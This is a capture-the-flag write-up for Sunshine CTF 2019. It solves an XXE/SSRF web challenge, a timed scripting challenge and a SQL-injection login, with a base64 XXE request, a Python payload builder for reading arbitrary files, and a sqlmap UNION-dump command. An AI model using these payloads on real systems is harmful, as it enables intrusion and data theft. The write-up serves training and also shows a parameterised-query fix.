Information#
CTF#
- Name : Sunshine CTF 2019
- Website : 2019.sunshinectf.org
- Type : Online
- Format : Jeopardy
- CTF Time : link
150 - Wrestler Name Generator - Web#
Even better than the Wu-Tang name generator, legend has it that Hulk Hogan used this app to get his name.
Author: dmaria
There is a form and a JavaScript snippet that turns it into an XML document before sending it. It must be an XXE injection again.
```html
<form>
```
Let's try an external entity injection with a payload using a PHP wrapper. The entity `test` is declared in the DOCTYPE as a SYSTEM entity whose URI is `php://filter/convert.base64-encode/resource=generate.php` (the filter returns the file as base64, so PHP source survives as text inside the XML), and `&test;` is dereferenced in `firstName`:
```xml
<input><firstName>&test;</firstName><lastName>rawsec</lastName></input>
```
The script sends the XML base64-encoded in the `input` parameter. Don't forget to URL-encode the characters that are special in a query string (here the trailing `+` becomes `%2b`; a raw `+` would be decoded as a space and corrupt the document), to avoid parsing errors:
```http
GET /generate.php?input=PD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0nVVRGLTgnPz48IURPQ1RZUEUgcm9vdCBbPCFFTlRJVFkgdGVzdCBTWVNURU0gJ3BocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9Z2VuZXJhdGUucGhwJz5dPjxpbnB1dD48Zmlyc3ROYW1lPiZ0ZXN0OzwvZmlyc3ROYW1lPjxsYXN0TmFtZT5yYXdzZWM8L2xhc3ROYW1lPjwvaW5wdXQ%2b HTTP/1.1
```
The response contains the dump of generate.php in base64:
```http
HTTP/1.1 200 OK
```
Let's decode it and see what it looks like:
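As an added example (not the challenge's code, and not the real generate.php, which is not reproduced here), the Python below builds the same XXE document, encodes it the way the page's JavaScript does, and decodes a constructed sample response the way this step requires. The entity name, the element names and the php://filter wrapper are the ones used above; PAGE_PARAM is the `input` value from the request above, used only to check that the construction matches; the sample response and the helper names are this example's own assumptions.

```python
import base64
import re
from urllib.parse import quote

# Added example, not the challenge's own code. The entity name "test", the
# element names and the php://filter wrapper come from the write-up; the
# helper names and the sample response below are constructed for this example.

# The `input` query parameter exactly as sent in the request above.
PAGE_PARAM = ("PD94bWwgdmVyc2lvbj0nMS4wJyBlbmNvZGluZz0nVVRGLTgnPz48IURPQ1RZUEUgcm9vdCBb"
              "PCFFTlRJVFkgdGVzdCBTWVNURU0gJ3BocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNv"
              "ZGUvcmVzb3VyY2U9Z2VuZXJhdGUucGhwJz5dPjxpbnB1dD48Zmlyc3ROYW1lPiZ0ZXN0Ozwv"
              "Zmlyc3ROYW1lPjxsYXN0TmFtZT5yYXdzZWM8L2xhc3ROYW1lPjwvaW5wdXQ%2b")


def xxe_payload(resource, entity="test", last_name="rawsec"):
    """XML that declares an external entity reading `resource` through PHP's
    base64 filter and dereferences it inside <firstName>, so the file content
    comes back inside the generated name instead of breaking the parse."""
    return (
        "<?xml version='1.0' encoding='UTF-8'?>"
        f"<!DOCTYPE root [<!ENTITY {entity} SYSTEM "
        f"'php://filter/convert.base64-encode/resource={resource}'>]>"
        f"<input><firstName>&{entity};</firstName>"
        f"<lastName>{last_name}</lastName></input>"
    )


def encode_input(xml):
    """The page's JavaScript base64-encodes the XML and sends it as ?input=.
    '+', '/' and '=' from the base64 alphabet are special in a query string
    (a raw '+' decodes to a space), so they must be percent-encoded."""
    b64 = base64.b64encode(xml.encode()).decode()
    return quote(b64, safe="")


def leaked_file(response_body):
    """Recover the file from a response in which the entity expanded to its
    base64 form: find the long base64 run and decode it."""
    m = re.search(r"[A-Za-z0-9+/]{16,}={0,2}", response_body)
    if not m:
        raise ValueError("no base64 blob found in response")
    return base64.b64decode(m.group(0)).decode()


# Constructed stand-in for the server's reply: the generated name embeds the
# expanded entity, i.e. the base64 of the requested file.
SAMPLE_SOURCE = "<?php\n// stand-in for generate.php\necho 'hello';\n"
SAMPLE_RESPONSE = ("<wrestler>" + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
                   + " rawsec</wrestler>")


if __name__ == "__main__":
    xml = xxe_payload("generate.php")
    print("matches the request above:",
          encode_input(xml) == PAGE_PARAM.replace("%2b", "%2B"))
    print(leaked_file(SAMPLE_RESPONSE))
```

`quote` emits `%2B` where the page shows `%2b`; both decode to `+`, which is why the comparison normalises the case of the escape. Swap `resource=` for any other readable path to dump other files the same way.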
We must fool the server into believing the page is accessed from localhost. The `X-Forwarded-For` HTTP header doesn't work here.
So we must do an SSRF from the XXE: declare the external entity with the URL of the page on the local server, so that the PHP process itself fetches generate.php from localhost. The document body is the same in both variants; only the SYSTEM URI of the entity in the DOCTYPE changes. Directly:
```xml
<input><firstName>&test;</firstName><lastName>rawsec</lastName></input>
```
or with base64 encoding of the output (the same `php://filter/convert.base64-encode` wrapper), so the fetched page survives as text inside the XML:
```xml
<input><firstName>&test;</firstName><lastName>rawsec</lastName></input>
```
I got the flag: `sun{1_l0v3_hulk_7h3_3x73rn4l_3n717y_h064n}`.
50 - TimeWarp - Scripting#
Oh no! A t3mp0ral anoma1y has di5rup7ed the timeline! Y0u'll have to 4nswer the qu3stion5 before we ask them!
nc tw.sunshinectf.org 4101
Author: Mesaj2000
The trick: send a wrong value, parse the reply to learn the right one and store it, reconnect and start from the beginning, replay every right value learnt so far, send a wrong value for the next one, and repeat until all 300 values are known.
I made a slow Ruby script that needs more than 1 hour to solve the challenge:
```ruby
require 'socket'
```
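The same strategy in Python, as an added example rather than the author's Ruby script: a mock oracle that behaves the way the page describes (a wrong answer leaks the expected value and ends the connection) and a solver that learns one value per connection. The page does not reproduce the service's prompts, so the wording of the mock's questions and replies, its answers and its flag are assumptions; `SocketSession` shows the same interface over a real TCP connection to the host and port given above.

```python
import re
import socket

# Added example, not the author's Ruby solver. The page only says that a
# wrong answer reveals the right one and that there are 300 values; the
# prompt and reply wording of the mock oracle below, its answers and its
# flag are assumptions constructed so the solver can be run offline.

N_VALUES = 300
MOCK_ANSWERS = [str((i * 7919) % 1000) for i in range(N_VALUES)]   # constructed
MOCK_FLAG = "sun{mock_flag_not_the_real_one}"                       # constructed


class MockSession:
    """One connection to a TimeWarp-like oracle: it asks its questions in
    order, and the first wrong answer leaks the expected value and ends the
    connection, which is exactly what the solving strategy relies on."""

    def __init__(self, answers):
        self.answers = answers
        self.idx = 0
        self.outbox = ["Question 1: ?\n"]
        self.closed = False

    def recv_line(self):
        return self.outbox.pop(0) if self.outbox else ""

    def send_line(self, text):
        if self.closed:
            raise ConnectionError("peer closed the connection")
        if text.strip() == self.answers[self.idx]:
            self.idx += 1
            if self.idx == len(self.answers):
                self.outbox.append(f"Correct! {MOCK_FLAG}\n")
                self.closed = True
            else:
                self.outbox.append(f"Question {self.idx + 1}: ?\n")
        else:
            self.outbox.append(f"Wrong! The answer was {self.answers[self.idx]}\n")
            self.closed = True

    def close(self):
        self.closed = True


class SocketSession:
    """Same interface over TCP, for the real target (nc tw.sunshinectf.org
    4101). Reading through a buffered file object instead of recv(1) loops
    is the kind of socket tuning the write-up's PS mentions."""

    def __init__(self, host, port):
        self.sock = socket.create_connection((host, port))
        self.f = self.sock.makefile("rw")

    def recv_line(self):
        return self.f.readline()

    def send_line(self, text):
        self.f.write(text + "\n")
        self.f.flush()

    def close(self):
        self.f.close()
        self.sock.close()


def solve(open_session, wrong_guess="?"):
    """Learn one value per connection: replay what is known, answer the next
    question wrongly on purpose, record the leaked answer, reconnect."""
    known, connections = [], 0
    while True:
        session = open_session()
        connections += 1
        try:
            for value in known:          # replay the answers learnt so far
                session.recv_line()
                session.send_line(value)
            line = session.recv_line()
            flag = re.search(r"sun\{[^}]*\}", line)
            if flag:                     # every value was right: flag time
                return flag.group(0), known, connections
            session.send_line(wrong_guess)
            reply = session.recv_line()
            leaked = re.search(r"answer was (\S+)", reply)
            if not leaked:
                raise RuntimeError(f"unexpected reply: {reply!r}")
            known.append(leaked.group(1))
        finally:
            session.close()


if __name__ == "__main__":
    flag, values, n = solve(lambda: MockSession(MOCK_ANSWERS))
    print(f"{flag} after {n} connections, {len(values)} values learnt")
    # Against the real service: solve(lambda: SocketSession("tw.sunshinectf.org", 4101))
```

The cost is quadratic in the number of values (connection k replays k-1 answers), which is why the real run takes so long: 300 values need 301 connections and about 45,000 exchanged lines, so per-line latency dominates and buffering the socket reads pays off.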
PS: changing the TCP socket behaviour and the read buffer size can drastically improve the timing.
100 - WrestlerBook - Web#
WrestlerBook is the social network for wrestlers, by wrestlers. WrestlerBook is exclusively for wrestlers, so if you didn't get an invite don't even bother trying to view our profiles.
Author: dmaria
A classic SQLi in the login form; the whole job is knowing how to drive sqlmap. The `password` parameter is injectable, the backend is SQLite and a UNION-based query dumps the `flag` column of the `users` table:
```sh
sqlmap -u 'http://bk.sunshinectf.org/login.php' --method POST --data 'username=a&password=b' -p password --dbms SQLite --technique U -T users -D SQLite_masterdb -C flag --risk 3 --union-from users --dump --flush-session
```
PS: column retrieval with sqlmap for the SQLite DBMS is buggy.
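To see what that sqlmap invocation exploits, here is a minimal SQLite login in Python with the injectable query next to its parameterised fix (added example, not WrestlerBook's code). Only the table `users` and the column `flag` come from the command above; the other columns, the query the login page runs, the hand-written UNION payload and the stored flag are assumptions.

```python
import sqlite3

# Added example, not WrestlerBook's code. The table "users" and the column
# "flag" come from the sqlmap command above; the other columns, the query
# the login page runs and the payload are assumptions made for this demo.

def make_db():
    """In-memory SQLite stand-in for the challenge database (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, flag TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'hulk', 'brother!', 'sun{constructed_flag}')")
    return db

def login_vulnerable(db, username, password):
    """String-built query: the password value is parsed as SQL, not as data."""
    sql = ("SELECT id, username, flag FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchone()

def login_fixed(db, username, password):
    """Bound parameters: the same input is only ever compared as a string."""
    sql = "SELECT id, username, flag FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()

# What `--technique U -p password --union-from users -C flag` amounts to,
# by hand: close the string, append a SELECT with the same column count as
# the original query (3 here, which sqlmap discovers by probing), take the
# flag column from users, and comment out the trailing quote.
UNION_PAYLOAD = "' UNION SELECT 1, 'attacker', flag FROM users--"

def dump_flag_via_union(db):
    """No valid credentials: the first SELECT returns nothing and the UNION
    row, carrying the flag where the app expects a profile, is returned."""
    row = login_vulnerable(db, "nobody", UNION_PAYLOAD)
    return row[2] if row else None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", dump_flag_via_union(db))
    print("fixed:", login_fixed(db, "nobody", UNION_PAYLOAD))
```

The same payload against `login_fixed` returns nothing, because the driver sends the quote and the `UNION` as literal characters to compare against the password column rather than as SQL.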